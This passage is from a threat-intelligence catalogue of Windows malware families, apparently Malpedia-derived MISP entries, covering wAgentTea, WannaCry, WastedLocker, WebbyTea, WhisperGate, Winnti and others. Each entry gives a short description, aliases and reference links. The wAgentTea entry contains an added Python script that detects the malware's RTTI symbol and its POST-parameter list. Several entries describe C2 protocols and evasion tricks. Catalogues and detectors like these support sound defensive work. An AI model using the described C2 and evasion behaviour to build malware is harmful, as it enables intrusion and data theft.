https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot

https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html

wAgentTea

wAgentTea is an HTTP(S) downloader.

It was deployed mostly against South Korean targets such as a pharmaceutical company (Q4 2020) or the semiconductor industry (Q2 2023). In several cases, initial access was obtained via exploitation of South Korean software like Initech’s INISAFE CrossWeb EX or Dream Security’s MagicLine4NX.

It uses AES-128 for encryption and decryption of its network traffic, and for decryption of its binary configuration.

There is a hard-coded list of parameter names used in its HTTP POST request: identy;tname;blogdata;content;thesis;method;bbs;level;maincode;tab;idx;tb;isbn;entry;doc;category;articles;portal

It contains a specific RTTI symbol ".?AVCHttp_socket@@".
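The two indicators quoted in this entry, the RTTI type name and the hard-coded parameter list, lend themselves to a static check on a sample and a network check on a captured POST body. The following is an added example, not code from AhnLab, Kaspersky or Malpedia. The sample bytes and the two POST bodies are constructed for illustration and are not real captures; joining the parameter names with ";" and no spaces is an assumption about how the list is stored in the binary, and the 0.5 overlap threshold is an assumed tuning value.

```python
"""Hunting checks built from the wAgentTea indicators quoted in this entry:
the MSVC RTTI type name ".?AVCHttp_socket@@" and the hard-coded list of HTTP
POST parameter names.

Added example, not code from AhnLab, Kaspersky or Malpedia. SAMPLE_BINARY,
BENIGN_BINARY and the two POST bodies are constructed here; the ";"-joined
storage format of the parameter list is an assumption.
"""
from urllib.parse import parse_qs

RTTI_SYMBOL = b".?AVCHttp_socket@@"
POST_PARAMS = ("identy;tname;blogdata;content;thesis;method;bbs;level;maincode;"
               "tab;idx;tb;isbn;entry;doc;category;articles;portal").split(";")
PARAM_BLOB = ";".join(POST_PARAMS).encode()   # assumed on-disk form of the list


def scan_binary(data: bytes) -> dict:
    """Static check on a file image.

    MSVC keeps the decorated class name of every class with RTTI as a plain
    ASCII string in the type descriptor, so the symbol survives even when the
    malware's other strings are encrypted. The joined parameter list is the
    stronger indicator; single names like "tab" or "idx" are too common to
    count on their own, so they are not matched individually.
    """
    return {
        "rtti_symbol": RTTI_SYMBOL in data,
        "param_blob": PARAM_BLOB in data,
    }


def post_param_overlap(body: str) -> float:
    """Network check: share of parameter names in a POST body that come from
    the wAgentTea list (1.0 means every name in the body is on the list)."""
    names = set(parse_qs(body, keep_blank_values=True))
    if not names:
        return 0.0
    return len(names & set(POST_PARAMS)) / len(names)


def verdict(data: bytes, body: str, min_overlap: float = 0.5) -> bool:
    """True when either the static or the network indicator fires."""
    static = scan_binary(data)
    return (static["rtti_symbol"] or static["param_blob"]
            or post_param_overlap(body) >= min_overlap)


# Constructed sample: a fake PE-like blob carrying both indicators, and a
# benign-looking blob carrying neither.
SAMPLE_BINARY = (b"MZ\x90\x00" + b"\x00" * 60 + RTTI_SYMBOL + b"\x00" * 8
                 + PARAM_BLOB + b"\x00" * 8)
BENIGN_BINARY = b"MZ\x90\x00" + b"\x00" * 60 + b".?AVCWinApp@@\x00user=admin\x00"

# Constructed POST bodies: one using wAgentTea names, one ordinary form post.
SAMPLE_POST = "identy=3f2a9c&tname=WS-0042&blogdata=AAECAwQ%3D&level=1"
BENIGN_POST = "q=quarterly+report&page=2&sort=date"

if __name__ == "__main__":
    print(scan_binary(SAMPLE_BINARY), post_param_overlap(SAMPLE_POST))
    print(scan_binary(BENIGN_BINARY), post_param_overlap(BENIGN_POST))
```

The overlap ratio, rather than a hit on any single name, is what keeps the network check usable: names such as content, level, tab, idx and category appear in plenty of legitimate web traffic, and only a body made almost entirely of names from this list is worth an alert.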

The tag is: misp-galaxy:malpedia="wAgentTea"

wAgentTea is also known as:

  • wAgent

Table 4940. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wagenttea

https://asec.ahnlab.com/en/33801/

https://asec.ahnlab.com/wp-content/uploads/2023/10/20231013_Lazarus_OP.Dream_Magic.pdf

https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

WannaCryptor

The tag is: misp-galaxy:malpedia="WannaCryptor"

WannaCryptor is also known as:

  • Wana Decrypt0r

  • WannaCry

  • WannaCrypt

  • Wcry

Table 4942. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today

https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf

http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/

https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/

https://metaswan.github.io/posts/Malware-Lazarus-group’s-Brambul-worm-of-the-former-Wannacry-1

https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf

https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html

https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/

https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf

https://www.youtube.com/watch?v=Q90uZS3taG0

https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58

https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html

https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d

https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/

https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e

https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984

http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html

https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf

https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign

https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf

https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html

https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://swanleesec.github.io/posts/Malware-Lazarus-group’s-Brambul-worm-of-the-former-Wannacry-1

https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/

https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/

WannaHusky

According to Mars, WannaHusky is a Nim-compiled ransomware malware sample, created for demonstration purposes and provided as part of the Practical Malware Analysis & Triage course provided by HuskyHacks.

The tag is: misp-galaxy:malpedia="WannaHusky"

WannaHusky is also known as:

Table 4943. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky

https://medium.com/@mars0x/wannahusky-malware-analysis-w-yara-ttps-2069fb479909

WannaRen

Ransomware.

The tag is: misp-galaxy:malpedia="WannaRen"

WannaRen is also known as:

Table 4944. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren

https://id-ransomware.blogspot.com/2020/03/wannaren-ransomware.html

WastedLoader

This malware looks similar to WastedLocker, but the ransomware component is missing.

The tag is: misp-galaxy:malpedia="WastedLoader"

WastedLoader is also known as:

Table 4945. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf

WastedLocker

WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates, which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was also used by other malware families such as Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase the entropy of the sample and hide the actual code.

The tag is: misp-galaxy:malpedia="WastedLocker"

WastedLocker is also known as:

Table 4946. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker

https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/

https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/

https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/

https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf

https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/

https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/

https://www.bbc.com/news/world-us-canada-53195749

https://unit42.paloaltonetworks.com/wastedlocker/

https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://ioc.hatenablog.com/entry/2020/08/16/132853

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf

https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/

https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html

https://seguranca-informatica.pt/wastedlocker-malware-analysis/.YfAaIRUITTY.twitter

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp

https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/

https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US

https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://securelist.com/wastedlocker-technical-analysis/97944/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Waterbear

Waterbear, also known as DbgPrint in its earlier export function, has been active since 2009. The malware is presumably developed by the BlackTech APT group and adopts advanced anti-analysis and forward-thinking design. These designs include a sophisticated shellcode stager, the ability to load plugins on-the-fly, and overall evasiveness should the C2 server fail to respond with a valid session key.

The tag is: misp-galaxy:malpedia="Waterbear"

Waterbear is also known as:

  • DbgPrint

  • EYEWELL

Table 4947. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf

https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/

https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/

https://daydaynews.cc/zh-tw/technology/297265.html

https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html

https://www.youtube.com/watch?v=6SDdUVejR2w

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

WaterMiner

The tag is: misp-galaxy:malpedia="WaterMiner"

WaterMiner is also known as:

Table 4948. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer

https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner

WaterSpout

The tag is: misp-galaxy:malpedia="WaterSpout"

WaterSpout is also known as:

Table 4949. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

WebbyTea

WebbyTea is an HTTP(S) downloader that uses AES for C&C traffic encryption.

It sends detailed information about the victim’s environment, like proxy settings, system installation date, Windows product name and version, manufacturer, product name, system boot time, time zone, computer name, user name, current time and a list of currently running processes. Data sent to the C&C server consists of the prefix "ci", a 16-character-long hexadecimal string representing the victim ID and encrypted data about the victim’s system. After the payload is acquired from the server and successfully injected into a newly created explorer.exe process, the malware responds back with the same victim ID, with the prefix changed to "cs".

The internal DLL name of the native WebbyTea is usually pe64.dll or webT64.dll (from which its name is derived).

The usual payload associated with WebbyTea is SnatchCrypto.

The tag is: misp-galaxy:malpedia="WebbyTea"

WebbyTea is also known as:

Table 4950. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea

https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/

https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

WebMonitor RAT

On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.' Unit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows creating client binaries that will not show any popup or dialogue during installation or while running on a target system.

The tag is: misp-galaxy:malpedia="WebMonitor RAT"

WebMonitor RAT is also known as:

  • RevCode

Table 4964. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor

https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/

https://revcode.se/product/webmonitor/

https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord

https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/

WeControl

The tag is: misp-galaxy:malpedia="WeControl"

WeControl is also known as:

Table 4965. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wecontrol

https://unit42.paloaltonetworks.com/westeal/

WellMess

WellMess is a Remote Access Trojan written in GoLang and .NET. It has hard-coded User-Agents. Attackers deploy WellMess using separate tools which also allow lateral movement, for example "gost". Command and Control traffic is handled via HTTP using the Set-Cookie field and message body.

The tag is: misp-galaxy:malpedia="WellMess"

WellMess is also known as:

Table 4966. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess

https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

https://community.riskiq.com/article/541a465f/description

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

https://censys.com/advanced-persistent-infrastructure-tracking/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://us-cert.cisa.gov/ncas/alerts/aa21-116a

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf

https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

WeSteal

The tag is: misp-galaxy:malpedia="WeSteal"

WeSteal is also known as:

Table 4967. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.westeal

https://unit42.paloaltonetworks.com/westeal/

WhiskerSpy

The tag is: misp-galaxy:malpedia="WhiskerSpy"

WhiskerSpy is also known as:

Table 4968. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.whiskerspy

https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html

WhisperGate

Destructive malware deployed against targets in Ukraine in January 2022.

The tag is: misp-galaxy:malpedia="WhisperGate"

WhisperGate is also known as:

  • PAYWIPE

Table 4969. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/

https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html

https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/

https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md

https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/

https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine

https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk

https://www.netskope.com/blog/netskope-threat-coverage-whispergate

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf

https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/

https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://www.secureworks.com/blog/whispergate-not-notpetya

https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb

https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months

https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/

https://inquest.net/blog/2022/02/10/380-glowspark

https://twitter.com/HuskyHacksMK/status/1482876242047258628

https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/

https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html

https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/

https://twitter.com/knight0x07/status/1483401072102502400

https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html

https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/

https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf

https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://twitter.com/nunohaien/status/1484088885575622657

https://www.brighttalk.com/webcast/15591/534324

https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

https://cert.gov.ua/article/18101

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.crowdstrike.com/blog/who-is-ember-bear/

https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/

https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

https://www.elastic.co/fr/security-labs/operation-bleeding-bear

https://thehackernews.com/2022/02/putin-warns-russian-critical.html

https://rxored.github.io/post/analysis/whispergate/whispergate/

https://www.youtube.com/watch?v=Ek3URIaC5O8

https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/

https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://twitter.com/Libranalysis/status/1483128221956808704

https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/

https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/

https://www.youtube.com/watch?v=2nd-f1dIfD4

https://unit42.paloaltonetworks.com/atoms/ruinousursa/

https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/

WhiteBird

According to Dr.Web, WhiteBird is a backdoor written in C++ and designed to operate in both 32-bit and 64-bit Microsoft Windows operating systems. The configuration is encrypted with a single byte XOR key. An interesting feature is that the malware can be restricted to operate only within certain "working_hours" with a granularity of one minute.

The tag is: misp-galaxy:malpedia="WhiteBird"

WhiteBird is also known as:

Table 4970. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird

https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf

https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf

WildFire

The tag is: misp-galaxy:malpedia="WildFire"

WildFire is also known as:

Table 4974. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire

winlog

The tag is: misp-galaxy:malpedia="winlog"

winlog is also known as:

Table 4977. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winlog

https://github.com/Thibault-69/Keylogger-Windows-----WinLog

Winnti (Windows)

The tag is: misp-galaxy:malpedia="Winnti (Windows)"

Winnti (Windows) is also known as:

  • BleDoor

  • JUMPALL

  • Pasteboy

  • RbDoor

Table 4979. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti

https://attack.mitre.org/groups/G0096

https://github.com/TKCERT/winnti-nmap-script

https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html

https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/

https://content.fireeye.com/api/pdfproxy?id=86840

https://www.lastline.com/labsblog/helo-winnti-attack-scan/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://securelist.com/games-are-over/70991/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/

https://github.com/br-data/2019-winnti-analyse/

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf

https://content.fireeye.com/apt-41/rpt-apt41/

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf

https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/

https://github.com/TKCERT/winnti-detector

https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/

https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html

https://github.com/TKCERT/winnti-suricata-lua

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

